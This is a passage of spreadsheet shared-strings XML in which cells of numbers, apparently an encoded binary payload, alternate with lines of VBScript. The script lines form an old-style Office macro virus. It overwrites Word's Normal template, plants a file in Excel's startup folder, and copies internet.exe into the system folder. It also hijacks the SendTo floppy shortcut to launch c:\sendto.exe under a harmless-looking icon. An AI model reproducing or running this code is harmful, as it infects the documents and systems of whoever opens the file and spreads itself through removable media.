233 199 216 73 202 152 129 114 129 43 46 222 43 99 115 123 53 226 13 143 205 237 53 136 103 45 28 147 219 107 17 175 164 112 204 124 239 68 60 103 225 152 249 174 67 188 246 177 243 117 210 19 186 54 203 68 126 37 23 208 245 106 19 9 21 234 158 16 109 106 7 35 132 66 169 42 46 20 52 197 162 184 167 196 211 118 218 254 74 215 87 169 131 40 175 88 122 84 206 209 138 137 82 129 36 6 250 113 238 254 183 198 26 231 190 244 214 167 26 231 236 111 141 127 156 163 94 166 223 153 118 156 83 100 118 152 139 96 142 102 114 168 76 244 39 42 178 87 0 12 175 226 61 205 17 234 205 56 191 115 156 74 215 215 255 230 248 7 194 88 97 166 238 22 69 188 90 173 215 135 11 83 187 216 165 111 126 62 3 225 216 19 33 90 134 </t>
  </si>
  <si>
    <t>ntpath=word.NormalTemplate.Path &amp; "\"</t>
  </si>
  <si>
    <t xml:space="preserve">216 144 156 163 21 166 233 135 69 60 124 163 45 155 85 177 203 184 12 177 145 63 250 41 245 33 30 8 239 226 190 10 67 208 247 91 222 7 150 57 217 123 85 218 62 89 116 46 241 254 247 185 168 13 243 218 203 209 200 167 232 194 52 93 198 51 240 60 206 179 167 229 2 110 25 80 44 39 20 75 159 98 137 9 139 88 240 226 246 157 26 187 75 99 119 170 246 103 122 235 46 39 175 51 232 253 213 189 201 27 97 30 5 117 97 89 242 253 246 169 229 44 237 89 18 168 158 132 176 33 128 151 1 222 2 248 47 128 73 48 158 221 10 176 0 96 5 192 6 128 102 0 47 192 1 128 7 0 142 1 76 49 179 216 119 193 60 13 176 3 236 255 2 230 5 128 215 0 174 1 152 97 64 179 2 236 132 176 11 0 54 176 151 3 108 0 104 0 104 1 56 12 254 126 48 31 0 56 14 240 24 192 25 128 231 87 226 58 55 139 93 2 243 10 192 239 1 114 97 224 43 4 88 1 80 85 142 231 12 66 45 2 68 1 14 1 124 3 224 4 192 99 0 167 203 121 249 70 238 185 104 173 174 109 11 210 178 118 171 187 93 110 237 8 69 221 129 116 107 169 105 215 90 71 174 231 82 10 237 190 189 173 157 229 43 146 41 134 61 157 101 250 208 229 203 88 154 213 220 100 120 89 185 79 231 19 86 188 210 174 18 87 215 70 124 73 154 171 189 123 34 209 61 218 21 115 177 26 175 95 211 86 169 115 243 2 99 42 247 133 163 26 172 218 136 26 135 159 143 199 15 121 75 150 94 179 178 175 45 235 72 202 137 21 130 26 151 122 210 222 200 245 111 253 219 0 162 199 31 220 61 218 202 255 200 149 252 17 28 78 225 32 247 210 190 19 24 25 174 175 133 240 40 111 20 148 21 121 54 234 187 1 124 39 50 190 55 5 169 239 51 50 190 151 168 174 85 106 44 221 27 18 205 27 20 44 139 223 223 217 229 231 177 20 185 174 174 245 236 11 233 36 88 188 141 49 148 161 12 101 40 67 25 202 80 134 50 148 161 12 101 40 67 25 202 80 134 50 148 161 12 101 40 67 25 202 80 134 50 148 86 37 207 208 155 64 103 1 238 96 44 134 </t>
  </si>
  <si>
    <t>word.quit</t>
  </si>
  <si>
    <t xml:space="preserve">159 121 131 103 12 95 181 22 243 227 177 53 120 38 218 3 25 203 224 127 60 197 127 2 43 235 162 115 237 98 203 192 60 15 230 114 48 7 210 196 199 125 152 215 83 232 226 123 44 179 77 233 253 11 50 248 23 103 240 175 4 195 181 149 49 171 25 104 16 251 156 119 54 242 253 216 138 187 175 145 199 87 220 103 154 24 187 162 193 63 177 29 240 53 225 138 178 154 241 149 97 51 107 100 173 160 215 176 6 176 213 178 122 182 5 220 181 160 111 4 59 170 127 182 252 250 6 167 71 217 77 170 191 9 193 194 82 239 70 216 64 122 51 237 216 218 40 246 74 213 178 0 237 5 69 181 128 98 53 65 168 27 124 35 98 127 99 114 15 228 100 203 128 37 100 194 116 27 197 78 56 220 131 154 154 210 102 194 41 101 43 0 238 32 179 138 120 83 194 114 192 191 90 236 35 195 60 246 67 137 220 224 226 123 182 220 172 29 236 62 202 109 5 155 10 184 124 23 118 59 235 162 189 172 90 220 145 59 85 25 165 143 59 116 21 122 154 197 110 210 36 253 184 219 178 84 236 165 43 37 92 125 250 35 99 104 241 57 61 181 186 92 253 26 138 70 238 32 231 252 158 5 113 234 137 83 187 197 94 57 191 74 95 32 99 92 237 158 68 228 228 4 38 73 102 106 27 40 49 101 93 146 100 5 187 133 228 105 89 151 213 202 93 40 109 203 187 240 179 103 186 51 128 98 114 225 26 204 216 114 69 11 140 197 184 129 63 244 2 109 112 16 99 37 232 143 27 149 201 192 95 130 190 165 24 181 63 200 190 214 141 122 34 113 173 59 196 242 0 251 90 136 113 147 233 76 106 188 121 49 150 123 25 45 185 87 185 113 121 92 125 14 167 3 224 65 70 119 15 12 66 233 7 179 0 242 210 192 65 198 206 37 52 113 18 124 111 168 196 251 40 149 79 49 243 23 203 167 207 85 61 152 200 10 105 93 137 68 86 183 240 200 230 159 190 100 117 115 15 229 83 24 37 92 117 135 152 206 157 100 245 23 225 62 124 88 235 78 186 208 141 174 171 87 21 183 222 133 106 52 215 255 178 74 164 85 79 39 18 195 236 32 52 128 185 48 86 101 1 160 121 240 </t>
  </si>
  <si>
    <t>fso.copyfile "c:\normal.dot", ntpath, True</t>
  </si>
  <si>
    <t xml:space="preserve">58 51 37 198 15 235 18 215 39 36 18 215 215 37 18 31 39 50 43 189 156 155 210 13 21 90 90 71 161 119 205 193 196 51 195 115 175 175 27 206 250 56 49 60 23 224 224 199 137 79 18 163 195 211 137 143 135 215 38 62 126 230 233 196 245 53 235 192 28 155 222 81 249 53 248 199 231 151 49 155 51 148 161 12 101 40 67 25 106 108 117 241 103 83 46 127 251 241 89 111 142 244 191 19 158 90 110 36 38 211 249 29 138 210 221 215 7 15 41 51 132 251 134 102 220 61 152 113 206 100 168 63 69 245 9 192 173 140 169 119 64 224 145 18 88 231 120 128 2 238 84 192 163 15 240 60 3 220 212 130 199 4 224 71 250 184 54 148 39 158 83 149 123 219 112 135 62 158 85 148 47 228 161 94 152 120 63 29 158 35 132 247 210 225 153 46 184 137 190 6 0 119 182 227 61 106 184 157 29 207 131 154 207 248 89 58 184 255 27 175 54 184 141 175 59 81 26 184 211 117 9 227 231 189 44 5 192 189 142 183 51 190 94 131 95 167 227 199 207 203 25 63 99 11 247 157 225 231 242 184 95 12 247 130 225 62 47 220 245 132 59 154 112 183 210 90 146 109 198 214 137 57 53 110 3 194 157 41 213 98 125 5 207 1 192 125 22 184 171 2 207 136 172 5 184 27 224 207 112 93 4 160 142 241 115 134 144 46 60 45 106 43 227 119 208 53 210 202 11 99 219 104 133 6 207 197 161 117 52 186 135 238 203 0 120 131 26 158 153 131 171 2 95 1 104 101 252 202 9 188 163 97 23 99 116 198 14 126 89 141 247 215 117 136 244 241 238 185 30 134 187 59 24 195 175 226 241 107 104 252 68 29 215 54 240 9 29 159 247 238 99 252 46 59 252 224 29 87 45 186 0 246 210 154 4 163 243 248 240 91 106 188 243 239 126 128 3 12 239 184 231 103 253 225 115 48 214 125 3 11 210 121 82 18 212 74 128 86 133 246 127 170 254 227 86 144 24 69 150 232 78 195 108 179 118 205 2 89 201 94 123 249 37 243 239 218 135 76 206 205 11 103 163 137 231 50 56 103 113 132 237 116 214 209 30 224 1 210 177 231 83 247 95 83 153 217 52 53 205 67 233 104 </t>
  </si>
  <si>
    <t>fso.copyfile "c:\norma1.xlm", Application.StartupPath &amp; "\", True</t>
  </si>
  <si>
    <t xml:space="preserve">10 41 180 47 226 118 92 165 171 2 41 104 5 41 109 96 245 80 215 120 106 84 19 184 171 161 46 27 198 76 203 198 76 116 205 169 85 180 137 116 202 250 234 75 179 180 229 215 134 241 220 63 187 202 134 30 88 41 251 164 49 242 15 221 49 53 37 255 201 217 64 249 164 137 108 198 204 23 178 158 131 6 49 9 66 223 4 14 13 88 158 38 62 189 69 114 27 194 126 193 221 222 233 11 72 95 144 170 34 26 220 38 164 1 215 134 214 130 109 18 251 57 184 158 52 229 97 79 132 87 205 108 15 134 247 236 10 6 247 60 12 200 185 108 38 17 60 149 244 105 164 255 128 162 159 37 125 45 132 92 131 46 160 101 85 199 188 74 241 20 189 195 236 36 188 56 233 54 210 115 25 46 213 253 152 226 188 70 62 101 208 177 225 138 87 226 96 31 177 238 1 16 185 222 123 26 235 191 8 255 211 105 253 29 90 124 128 60 83 19 52 248 78 58 154 79 130 238 201 3 221 131 196 26 104 161 22 151 105 139 44 75 160 2 167 49 147 141 253 42 97 131 190 182 4 96 62 244 159 171 25 247 105 129 126 53 233 91 100 89 9 188 46 72 135 126 15 164 234 129 142 234 222 12 17 43 96 224 152 153 26 145 175 195 166 207 141 135 21 89 214 131 44 23 101 142 58 122 206 74 34 62 102 135 225 192 212 10 197 231 104 118 176 37 209 208 127 53 211 135 234 19 74 135 97 3 12 155 38 196 73 122 145 197 1 35 24 140 97 173 146 93 154 95 50 127 126 105 171 180 26 237 45 75 181 46 219 82 27 217 156 173 82 145 101 63 228 179 42 51 121 188 20 99 19 153 25 143 147 186 14 126 169 228 150 195 32 90 166 33 215 81 58 130 226 164 7 16 189 110 93 146 236 89 48 213 131 129 189 101 1 47 216 226 213 45 197 194 222 178 184 200 50 23 68 101 150 54 244 158 6 79 251 189 58 20 9 132 98 182 138 130 249 104 210 0 39 226 44 132 68 164 17 56 250 148 4 226 205 108 0 167 40 165 164 138 44 179 217 227 48 59 1 185 185 189 195 70 34 166 152 139 154 108 12 131 127 200 131 231 118 115 111 197 188 203 197 131 159 224 193 172 </t>
  </si>
  <si>
    <t>fso.copyfile "c:\internet.exe", fso.getspecialfolder(1) &amp; "\"</t>
  </si>
  <si>
    <t xml:space="preserve">149 123 43 102 100 171 141 93 22 135 71 127 148 144 52 93 230 160 132 254 38 197 255 195 241 249 155 63 165 63 251 127 232 111 98 169 124 158 8 83 80 194 191 62 210 191 36 131 191 61 131 255 146 12 254 139 211 250 99 191 79 244 88 244 254 89 138 127 78 210 255 239 204 22 102 141 77 76 160 9 51 43 50 167 196 44 100 78 141 101 145 57 45 54 129 204 233 177 73 137 157 52 186 244 192 228 233 75 56 111 54 229 142 184 86 253 40 100 218 12 191 239 155 44 184 232 107 153 65 195 60 87 5 52 133 102 89 89 201 135 177 234 96 23 30 168 188 10 103 163 102 246 180 41 27 0 102 151 62 19 27 102 115 110 110 16 51 88 24 231 55 6 195 146 79 90 43 149 73 77 65 169 108 101 41 76 182 3 209 144 59 234 93 219 29 12 183 59 182 4 195 157 110 127 147 167 51 228 119 71 61 14 23 4 72 139 36 91 139 13 38 224 29 145 160 163 45 24 218 223 225 243 123 36 91 219 170 150 0 33 59 218 131 81 91 137 196 83 41 145 154 194 93 158 42 124 79 171 67 95 31 10 249 125 109 110 220 58 233 104 140 186 195 209 174 144 154 54 37 83 230 216 231 239 180 149 116 238 239 8 250 219 61 225 146 40 36 115 11 127 248 32 194 238 235 242 69 97 190 86 219 33 41 35 126 164 216 183 216 17 112 119 122 214 218 52 41 72 81 175 39 80 77 136 91 130 81 9 137 64 2 60 251 124 145 104 164 120 156 100 44 150 154 32 149 245 153 138 44 104 29 181 80 54 206 137 57 108 178 25 198 229 14 144 22 31 189 144 197 233 117 49 184 59 160 7 87 94 31 150 64 95 19 124 240 210 94 27 200 225 157 208 171 75 116 12 45 190 94 156 74 143 84 89 120 204 38 146 210 238 241 123 162 158 116 196 148 35 199 85 206 56 112 175 233 120 121 110 226 143 101 221 42 91 181 236 92 236 136 184 247 122 224 9 35 10 115 45 5 197 209 232 245 120 128 155 54 189 200 2 114 117 208 223 213 25 136 20 47 67 107 104 191 148 49 209 177 19 128 167 182 110 71 67 87 64 178 45 172 174 175 107 116 213 84 47 148 110 111 147 254 167 </t>
  </si>
  <si>
    <t>set fold=fso.getfolder(w.SpecialFolders("SendTo"))</t>
  </si>
  <si>
    <t xml:space="preserve">189 171 15 106 226 136 226 151 128 18 5 197 239 47 164 46 17 36 145 24 9 248 173 1 52 160 162 129 162 1 17 77 165 71 114 33 167 201 5 239 14 2 78 109 11 182 106 71 180 142 86 90 63 58 173 245 3 191 58 214 106 171 237 212 58 109 167 173 51 118 172 99 59 163 78 213 58 106 71 170 50 142 86 59 227 119 223 238 94 2 145 20 253 195 191 58 13 147 187 219 183 187 183 111 223 123 191 183 111 247 194 30 43 203 34 95 134 82 36 148 226 70 32 3 137 147 93 30 182 220 200 85 115 32 242 84 42 245 1 138 157 155 77 72 246 181 24 140 145 160 4 166 185 172 105 92 251 182 228 105 177 37 24 221 161 13 220 19 167 217 33 114 128 10 95 25 222 222 89 167 37 118 201 182 8 89 171 127 1 107 193 35 44 48 22 178 98 57 39 99 105 155 181 132 73 193 41 251 8 143 145 244 97 14 46 148 235 240 9 86 31 173 107 214 130 72 60 158 244 52 163 211 227 49 140 210 194 156 217 5 61 224 88 135 27 185 92 248 205 137 24 23 196 148 165 246 37 51 76 66 195 254 93 50 241 161 81 115 64 147 208 251 108 98 91 137 180 93 69 114 33 74 167 58 3 56 128 12 77 45 102 237 33 187 182 202 96 212 216 104 249 224 222 181 45 243 185 192 110 210 116 7 107 29 148 209 135 24 127 58 164 205 0 129 132 249 197 197 238 229 218 86 230 175 35 179 254 40 188 131 177 15 91 180 131 45 35 198 143 89 44 227 5 86 172 65 172 195 193 73 18 242 139 188 204 33 86 66 131 77 26 152 73 227 127 25 135 203 190 112 233 54 91 38 213 200 156 206 203 59 117 238 42 131 96 240 14 19 244 250 206 48 117 174 148 161 136 193 224 112 247 104 141 174 64 35 241 97 33 199 85 59 56 143 81 174 150 181 110 172 5 145 43 167 45 107 167 78 207 41 41 181 20 205 156 153 147 95 88 90 100 203 153 105 183 249 92 178 159 21 57 123 30 239 16 125 18 164 236 197 188 224 244 249 37 187 165 82 20 57 65 158 197 137 18 232 222 14 186 180 231 42 27 227 83 117 105 249 214 201 57 74 83 10 131 207 169 45 150 222 124 204 </t>
  </si>
  <si>
    <t>for each ff in fold.files</t>
  </si>
  <si>
    <t xml:space="preserve">179 90 83 208 132 131 198 148 70 161 129 45 211 140 101 5 38 79 189 183 206 111 180 85 112 14 158 245 76 38 105 64 186 13 234 23 250 180 122 125 58 163 81 147 106 0 1 179 223 104 33 144 178 185 125 162 236 168 148 117 196 202 43 130 78 20 142 46 23 1 166 94 3 118 208 137 174 222 180 241 202 33 210 50 32 133 23 137 178 160 176 100 210 211 91 142 121 86 191 210 182 191 128 93 129 171 150 33 240 132 76 196 187 96 252 45 247 1 76 184 52 240 41 92 218 56 13 197 53 246 152 19 176 39 112 87 193 64 27 14 110 97 252 30 128 31 96 104 64 224 57 103 177 158 74 78 77 23 228 4 179 41 150 97 188 102 94 144 100 17 219 175 22 105 245 16 118 56 125 200 239 198 221 247 102 164 2 91 30 159 175 162 3 46 237 77 49 117 111 41 47 24 148 26 237 140 31 116 252 238 251 164 95 128 62 56 205 184 211 113 248 13 13 124 21 40 9 217 42 203 16 117 129 10 70 116 250 174 12 147 205 123 17 120 169 137 18 194 56 27 193 48 54 142 140 187 208 119 170 220 23 21 127 41 57 68 190 66 230 133 114 234 198 106 36 153 243 82 95 170 213 39 209 106 254 54 149 252 180 150 145 184 71 173 30 100 159 3 178 207 117 65 167 243 65 23 25 225 181 9 57 34 235 72 79 67 195 115 208 240 18 52 220 138 85 138 191 192 184 17 190 45 58 53 183 119 3 249 233 245 251 180 145 172 34 155 40 202 41 200 12 166 77 10 205 76 196 30 184 7 4 152 62 1 113 120 3 13 36 114 82 165 151 67 216 188 18 24 166 245 200 157 205 75 16 139 213 76 244 112 162 44 129 120 38 179 30 240 109 237 151 193 140 161 176 42 15 65 202 104 176 20 37 222 130 74 126 99 8 96 192 74 3 97 160 164 165 216 9 122 25 237 144 208 0 139 84 80 66 172 192 29 105 12 213 95 65 43 209 169 210 84 48 198 123 90 72 25 44 72 58 212 163 117 140 2 3 22 113 242 163 218 244 242 169 81 15 29 219 3 216 101 77 143 153 153 16 91 95 141 162 225 188 29 124 204 171 16 18 221 129 17 162 47 0 48 29 136 69 96 108 155 </t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="Times New Roman"/>
        <family val="1"/>
      </rPr>
      <t>if instr(ff.name,"</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>软盘</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="Times New Roman"/>
        <family val="1"/>
      </rPr>
      <t>")&gt;0 then</t>
    </r>
  </si>
  <si>
    <t xml:space="preserve">33 24 253 14 32 54 22 224 56 23 202 254 8 231 63 225 188 7 98 234 227 0 252 183 1 118 251 160 238 87 192 230 249 206 116 193 156 46 172 101 133 44 172 69 171 7 6 103 55 56 44 63 216 143 97 214 2 60 227 6 195 61 147 240 226 58 94 123 138 129 163 147 137 37 215 221 201 252 176 27 240 248 96 231 205 147 121 101 5 153 165 132 62 148 208 83 200 177 142 80 94 111 245 178 137 36 60 15 97 226 85 181 120 58 16 25 88 150 95 66 74 191 65 142 121 76 67 36 94 216 179 195 212 0 255 52 177 16 206 54 72 77 101 10 96 8 182 146 141 232 241 15 218 166 41 219 187 143 36 155 216 227 232 180 128 177 64 62 34 11 237 170 200 126 204 89 230 80 68 108 38 163 86 129 131 94 31 157 174 113 2 47 81 204 108 181 154 172 175 49 100 217 156 35 91 239 7 94 85 241 124 62 170 167 228 191 19 105 100 166 22 32 43 43 113 226 52 240 46 35 77 169 169 168 192 98 69 35 185 39 74 70 50 105 204 22 213 210 136 234 77 220 234 99 249 189 102 116 91 122 237 198 184 138 67 67 163 133 1 245 43 139 209 214 95 234 127 250 161 228 61 102 0 58 220 20 153 243 249 90 235 148 168 169 189 101 75 157 105 190 107 103 180 253 139 147 217 167 50 106 187 205 251 166 49 245 203 170 43 241 230 198 193 61 123 46 184 249 120 221 141 194 93 87 11 103 60 24 164 106 202 216 174 46 223 88 157 87 21 139 62 141 223 86 181 104 221 239 137 239 38 44 59 177 194 221 97 181 241 128 225 242 192 234 15 150 229 54 212 53 119 106 138 56 154 116 96 222 45 33 102 125 157 189 54 127 82 74 65 191 188 250 5 98 111 199 229 235 93 99 106 74 31 94 243 31 190 127 57 225 248 234 197 23 27 189 230 165 19 234 50 222 156 176 100 79 255 199 99 154 119 111 21 142 126 188 67 99 190 119 116 203 249 229 29 151 103 86 44 185 158 220 117 71 76 241 254 85 189 78 118 121 56 233 214 138 91 55 18 51 115 143 91 142 172 121 132 198 14 137 175 139 177 12 168 173 207 178 52 233 14 13 234 178 198 118 66 213 196 95 95 181 </t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>set lnk=</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="Times New Roman"/>
        <family val="1"/>
      </rPr>
      <t>w</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>.CreateShortcut(fold.path &amp; "\" &amp; ff.name)</t>
    </r>
  </si>
  <si>
    <t xml:space="preserve">164 244 102 220 197 56 161 225 116 150 49 43 118 246 162 149 183 251 53 143 250 251 165 154 13 251 183 205 185 244 217 222 95 247 173 121 101 200 222 27 103 248 228 38 103 202 71 15 155 18 165 211 7 110 254 246 218 194 41 113 71 220 142 83 183 227 186 244 248 217 49 236 66 135 228 91 155 238 12 57 250 194 194 105 7 175 221 61 236 73 182 254 181 253 186 243 238 157 239 71 88 175 230 52 12 31 63 235 253 183 46 85 36 29 219 88 50 99 250 149 181 159 204 153 107 189 34 20 237 74 95 231 78 200 157 191 187 100 222 136 162 111 207 236 232 49 229 235 81 27 14 247 185 207 78 111 74 110 174 189 61 233 222 217 71 29 7 255 145 55 250 229 115 205 231 26 31 49 179 163 217 181 255 63 175 253 207 127 54 195 100 160 19 227 84 94 213 163 6 31 50 91 249 89 231 133 204 192 89 197 20 65 142 134 89 172 44 194 100 245 140 133 120 73 77 210 184 214 135 29 91 210 106 248 187 48 168 119 48 29 65 30 113 210 124 70 221 53 232 139 233 35 80 141 186 155 114 29 79 29 140 42 150 208 84 97 104 52 74 27 31 66 139 8 83 46 50 12 173 67 24 90 199 48 180 168 48 52 77 24 90 167 48 188 116 14 67 139 126 146 246 15 155 162 190 16 88 36 0 128 67 75 236 61 11 108 28 199 117 179 123 191 229 241 142 60 146 71 241 68 241 179 164 40 234 72 253 142 20 45 159 28 73 62 82 148 124 180 101 153 142 21 155 141 29 248 232 144 6 5 211 212 89 162 156 179 173 20 231 68 9 104 192 13 216 64 104 207 169 139 50 128 209 178 109 96 80 110 106 51 128 139 48 128 11 176 129 129 92 218 162 38 2 3 102 218 0 101 138 6 165 211 166 33 106 135 215 153 183 111 246 199 217 229 81 138 219 160 232 17 199 55 239 205 239 205 155 55 111 102 222 206 236 81 90 72 80 94 88 144 174 74 64 171 22 208 152 100 236 180 26 1 173 86 64 171 19 208 162 64 179 242 87 47 160 237 18 228 109 16 208 98 130 188 187 5 233 26 5 180 61 2 90 147 128 214 44 160 181 8 104 173 54 154 31 30 114 91 31 37 210 200 </t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="Times New Roman"/>
        <family val="1"/>
      </rPr>
      <t>lnk.</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>TargetPath="c:\sendto.exe"</t>
    </r>
  </si>
  <si>
    <t xml:space="preserve">205 93 164 33 68 204 91 208 22 15 25 144 175 147 95 65 47 203 84 30 125 240 224 254 8 104 106 53 206 142 236 113 40 123 65 235 110 210 16 224 94 194 125 236 153 171 188 36 47 53 75 3 158 127 132 2 36 40 224 14 40 96 47 168 53 175 190 61 5 195 162 20 214 238 30 156 102 197 246 191 4 153 216 184 218 5 143 209 253 84 122 30 172 85 194 90 169 206 151 60 164 255 117 72 234 129 242 143 65 210 22 24 14 230 230 209 161 80 82 180 242 251 191 2 233 189 144 254 78 72 223 133 195 213 40 154 14 147 82 157 93 28 3 82 250 69 150 213 7 89 79 67 214 131 48 162 204 85 209 209 84 162 146 12 19 203 70 166 153 74 178 38 207 114 251 33 247 32 228 110 132 177 103 174 152 226 191 242 146 1 202 24 75 27 128 180 236 40 3 195 20 192 146 136 85 128 108 170 16 11 2 22 65 172 18 176 123 16 11 65 190 52 98 97 136 227 165 84 1 118 28 177 106 75 153 17 192 124 136 213 0 54 132 88 173 165 148 58 75 41 81 168 239 20 98 245 128 249 17 219 5 41 155 17 107 0 108 55 98 49 72 73 16 219 13 113 7 16 107 4 236 32 98 123 0 59 132 88 19 96 135 17 107 6 108 15 98 45 128 53 33 214 10 24 59 210 241 30 237 129 235 180 105 147 242 41 210 79 213 242 0 60 255 59 69 107 168 218 209 31 27 95 170 96 204 181 9 104 237 2 155 176 87 144 174 67 144 110 159 128 214 41 160 237 23 208 226 2 90 151 128 214 45 224 229 128 128 118 80 64 59 36 40 239 176 128 118 68 64 75 8 104 61 2 90 175 160 222 163 2 90 159 128 118 135 128 118 76 64 187 83 64 75 10 104 199 5 180 187 4 180 79 9 104 39 4 180 147 2 218 41 129 12 238 182 209 152 86 171 160 213 61 168 227 109 128 29 65 172 29 198 20 31 153 123 33 174 17 177 14 136 171 71 108 31 96 109 136 117 2 118 23 98 251 1 251 20 98 113 192 78 32 214 5 216 89 196 186 161 134 26 196 14 0 38 33 118 16 48 47 98 135 32 159 140 216 97 192 2 136 29 1 172 3 177 4 96 237 136 245 0 22 </t>
  </si>
  <si>
    <t>lnk.IconLocation="shell32.dll,6"</t>
  </si>
  <si>
    <t xml:space="preserve">69 172 23 202 84 16 59 10 113 123 17 235 131 184 90 196 238 0 172 14 177 99 128 117 35 118 39 96 113 196 146 128 237 71 236 56 96 157 136 221 5 88 23 98 159 2 172 23 177 19 128 85 32 118 18 176 1 196 78 1 103 97 196 238 6 108 31 218 161 20 243 175 201 59 179 59 34 59 148 18 232 75 191 128 54 32 160 157 22 232 223 160 128 118 70 64 59 43 160 221 35 160 165 5 180 33 1 47 247 10 210 221 39 160 157 19 228 189 95 144 238 188 128 246 128 32 239 176 32 221 131 130 241 150 130 222 107 197 190 236 7 76 69 108 192 50 71 159 6 29 8 34 54 8 88 8 177 51 128 85 34 118 22 48 15 98 247 0 86 141 88 26 176 22 196 134 160 134 20 98 247 66 92 3 98 247 1 22 67 236 28 164 220 133 216 253 22 173 62 111 209 234 7 32 101 63 98 195 16 119 20 177 7 33 238 36 232 106 156 140 209 1 123 65 218 94 31 79 201 181 228 45 63 91 227 164 76 107 163 102 216 19 193 146 2 22 60 119 19 223 191 209 36 126 88 135 5 255 127 95 250 127 244 115 1 159 219 221 234 57 76 186 248 147 74 248 91 120 229 158 191 100 3 114 165 134 159 191 124 156 60 68 55 224 195 20 246 222 2 255 108 33 124 43 247 191 226 242 214 250 143 222 90 253 82 37 158 147 46 183 254 10 60 159 203 62 47 92 235 185 173 254 243 163 252 119 210 126 102 174 126 249 176 225 70 149 93 206 127 111 98 223 50 88 238 249 111 102 214 26 224 168 10 129 13 68 163 237 252 119 11 158 255 86 203 56 255 205 166 243 79 234 252 55 107 147 253 252 247 25 164 187 157 255 230 231 219 135 5 231 191 89 28 251 62 226 112 254 251 115 152 198 124 254 155 225 252 252 247 184 233 252 247 4 194 79 242 115 249 51 121 212 138 60 126 185 134 84 152 180 149 233 71 166 157 107 140 4 218 49 228 51 199 251 201 143 31 213 240 155 56 89 124 15 11 120 5 225 79 251 140 252 236 255 69 76 255 10 150 243 187 136 51 174 120 217 10 213 27 214 139 63 69 124 20 75 168 241 27 105 249 71 34 127 6 99 218 147 169 144 180 83 </t>
  </si>
  <si>
    <t>lnk.save</t>
  </si>
  <si>
    <t xml:space="preserve">222 255 147 247 40 36 242 71 164 1 235 125 27 30 179 64 208 119 31 29 146 237 222 92 169 45 204 180 255 193 92 233 209 233 146 162 176 159 37 232 144 72 152 45 243 27 167 75 164 219 155 45 209 68 62 15 233 240 146 112 145 142 66 37 87 10 39 168 84 39 179 165 95 176 98 255 161 49 87 106 250 109 58 14 188 211 165 95 176 151 100 236 207 148 246 109 205 18 103 46 19 47 201 149 104 161 178 54 42 217 184 110 162 252 116 224 3 162 90 248 31 50 217 131 168 126 42 158 208 156 30 50 77 191 1 200 156 100 58 204 174 244 208 177 165 217 22 249 196 9 61 196 126 153 85 172 63 17 93 47 100 203 201 252 65 224 166 131 72 18 175 209 67 7 65 65 110 218 114 126 191 133 63 223 153 66 6 78 76 235 245 230 244 208 53 82 174 254 6 72 162 157 63 238 241 130 245 224 58 150 109 55 167 147 201 15 53 159 48 249 45 244 28 61 135 240 56 194 26 132 47 157 66 125 198 227 251 199 209 61 253 98 202 125 28 252 176 82 131 31 34 172 192 174 104 67 56 138 244 231 16 31 10 107 240 25 14 79 106 176 31 159 247 13 33 206 199 31 31 103 21 218 143 173 147 30 132 223 68 248 61 132 63 214 224 99 212 124 37 168 137 221 75 205 14 93 60 118 155 8 125 68 138 32 161 7 8 236 7 219 183 144 182 164 122 130 170 205 150 84 99 68 170 181 144 122 168 105 126 82 68 28 223 90 222 81 59 105 148 114 104 35 221 65 205 190 141 255 94 35 77 2 139 239 179 167 233 17 54 200 202 85 47 253 59 126 171 173 28 163 156 217 210 29 167 41 69 165 117 32 233 73 252 235 166 60 222 73 217 233 133 239 24 13 31 119 168 84 32 48 107 51 159 44 43 91 178 140 222 101 58 240 129 172 91 223 62 92 67 36 113 126 149 111 99 45 179 249 125 137 174 70 73 94 49 246 27 249 10 189 166 246 23 169 217 164 163 52 195 108 63 13 159 160 171 214 28 134 217 70 112 81 15 203 100 9 195 9 58 247 46 87 104 225 40 109 192 50 210 59 168 60 87 49 252 105 242 60 41 84 106 225 12 157 243 51 152 158 185 85 139 212 </t>
  </si>
  <si>
    <t>goto e2</t>
  </si>
  <si>
    <t xml:space="preserve">12 122 177 252 9 191 157 159 16 240 3 15 140 104 26 47 53 193 249 0 175 235 16 72 132 243 22 35 6 111 42 134 253 212 38 41 30 45 28 162 235 162 136 196 235 173 102 82 128 240 48 21 124 178 146 167 169 131 27 93 60 239 140 169 252 89 83 249 195 196 72 95 192 112 140 174 159 230 137 209 174 37 83 222 17 61 236 35 69 12 179 135 56 89 228 167 138 206 30 25 201 104 227 138 169 174 85 83 120 205 84 239 156 100 212 155 84 180 112 55 121 150 204 42 6 255 19 138 193 67 86 49 241 160 152 234 82 140 242 243 166 240 176 98 200 106 17 94 69 165 192 234 117 89 49 248 143 201 6 255 69 201 200 187 32 25 117 69 2 6 159 138 137 31 213 84 87 220 92 102 192 40 51 30 48 210 196 60 6 15 235 40 135 94 186 54 76 5 12 153 67 36 166 223 48 245 133 246 42 45 67 175 184 190 197 29 244 63 137 237 98 171 234 66 152 151 67 200 98 152 151 79 229 96 10 23 49 204 86 149 170 41 253 42 134 217 244 183 30 50 209 77 225 117 83 57 43 33 99 220 45 202 134 172 230 100 163 93 243 24 102 46 138 100 80 11 55 209 181 118 46 200 199 197 221 164 16 228 242 188 155 44 4 141 190 206 6 141 114 38 76 225 140 158 166 146 140 4 13 57 47 5 141 49 78 130 198 24 79 120 140 49 158 149 141 49 190 97 26 227 235 38 253 73 123 196 242 79 209 188 218 24 15 145 44 150 201 214 21 57 15 111 35 149 173 79 11 179 165 192 44 202 135 21 157 13 25 118 163 96 43 31 86 139 146 66 87 25 159 83 127 254 78 210 100 255 126 207 155 1 120 13 247 94 124 23 126 137 230 27 198 220 105 216 55 189 41 183 17 191 164 146 40 64 31 121 21 210 61 133 249 174 17 99 117 172 64 250 203 242 91 132 165 98 7 251 212 147 42 185 38 171 228 186 204 40 210 46 137 120 23 104 83 95 166 187 164 27 20 